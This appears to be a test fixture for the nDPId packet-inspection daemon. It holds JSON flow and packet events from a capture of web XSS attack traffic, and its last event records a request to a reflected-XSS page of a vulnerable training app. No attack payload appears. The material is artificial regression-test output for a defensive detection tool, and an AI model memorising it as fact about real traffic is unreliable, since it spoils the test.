-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2078,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347216659,"flow_last_seen":1499347216659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347216659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2078,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1499347216659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347216659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zDVAAD4G+ZqsEAABwKgKMtY0AFD0uxclAAAAAKACchCgVAAAAgQFtAQCCAoBOdsQAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2079,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1499347216659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347216659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1jQ3RTmT9LsXJqAScSB\/8QAAAgQFtAQCCAoD46yGATnbEAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1499347216660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347216660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zDZAAD4G+aGsEAABwKgKMtY0AFD0uxcmN0U5lIAQAOUe+QAAAQEICgE52xAD46yG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347219208,"flow_last_seen":1499347219208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347219208,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1499347219208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347219208,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UEtAAD4GdYWsEAABwKgKMtZOAFD4043GAAAAAKACchAjBAAAAgQFtAQCCAoBOd2NAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1499347219208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347219208,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1k7LcrrD+NONx6AScSDqxQAAAgQFtAQCCAoD468DATndjQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2098,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1499347219209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347219209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UExAAD4GdYysEAABwKgKMtZOAFD4043Hy3K6xIAQAOWJzQAAAQEICgE53Y0D468D"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347220447,"flow_last_seen":1499347220447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347220447,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1499347220447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347220447,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86ABAAD4G3c+sEAABwKgKMtZcAFBnOTbDAAAAAKACchAKXgAAAgQFtAQCCAoBOd7DAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1499347220447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347220447,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1lzT7Q76Zzk2xKAScSB0OAAAAgQFtAQCCAoD47A5ATnewwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2110,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1499347220448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347220448,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06AFAAD4G3dasEAABwKgKMtZcAFBnOTbE0+0O+4AQAOUTQAAAAQEICgE53sMD47A5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347221694,"flow_last_seen":1499347221694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1499347221694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89JJAAD4G0T2sEAABwKgKMtZqAFAcVCtpAAAAAKACchBfVwAAAgQFtAQCCAoBOd\/7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1499347221695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1mpdkOZGHFQraqAScSBnCgAAAgQFtAQCCAoD47FxATnf+wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1499347221695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347221695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09JNAAD4G0USsEAABwKgKMtZqAFAcVCtqXZDmR4AQAOUGEgAAAQEICgE53\/sD47Fx"} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347224338,"flow_last_seen":1499347224338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347224338,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1499347224338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347224338,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K5xAAD4GmjSsEAABwKgKMtaEAFDFiskTAAAAAKACchAVyAAAAgQFtAQCCAoBOeKPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1499347224338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347224338,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1oTh1R3txYrJFKAScSBe+gAAAgQFtAQCCAoD47QGATnijwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2140,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":1499347224339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347224339,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K51AAD4GmjusEAABwKgKMtaEAFDFiskU4dUd7oAQAOX+AAAAAQEICgE54pAD47QG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347225590,"flow_last_seen":1499347225590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347225590,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1499347225590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347225590,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hTdAAD4GQJmsEAABwKgKMtaSAFC4kmb\/AAAAAKACchCDjQAAAgQFtAQCCAoBOePIAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1499347225590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347225590,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1pJbUfWYuJJnAKAScSB6XwAAAgQFtAQCCAoD47U\/ATnjyAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1499347225591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347225591,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hThAAD4GQKCsEAABwKgKMtaSAFC4kmcAW1H1mYAQAOUZZgAAAQEICgE548kD47U\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347228091,"flow_last_seen":1499347228091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347228091,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1499347228091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347228091,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p6lAAD4GHiesEAABwKgKMtasAFAs20GTAAAAAKACchAyJQAAAgQFtAQCCAoBOeY6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1499347228091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347228091,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1qzT8idALNtBlKAScSB8PQAAAgQFtAQCCAoD47ewATnmOgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":1499347228092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347228092,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p6pAAD4GHi6sEAABwKgKMtasAFAs20GU0\/InQYAQAOUbRQAAAQEICgE55joD47ew"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347229416,"flow_last_seen":1499347229416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347229416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1499347229416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347229416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aTtAAD4GXJWsEAABwKgKMta6AFA5aI6+AAAAAKACchDXEwAAAgQFtAQCCAoBOeeFAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1499347229417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347229417,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1rr5YE9wOWiOv6AScSDSQgAAAgQFtAQCCAoD47j7ATnnhQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1499347229417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347229417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aTxAAD4GXJysEAABwKgKMta6AFA5aI6\/+WBPcYAQAOVxSgAAAQEICgE554UD47j7"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347230690,"flow_last_seen":1499347230690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347230690,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1499347230690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uy1AAD4GCqOsEAABwKgKMtbIAFCbKFPuAAAAAKACchCu1wAAAgQFtAQCCAoBOejDAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1499347230690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1shnmPeomyhT76AScSCSVwAAAgQFtAQCCAoD47o6ATnowwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1499347230691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347230691,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uy5AAD4GCqqsEAABwKgKMtbIAFCbKFPvZ5j3qYAQAOUxXgAAAQEICgE56MQD47o6"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 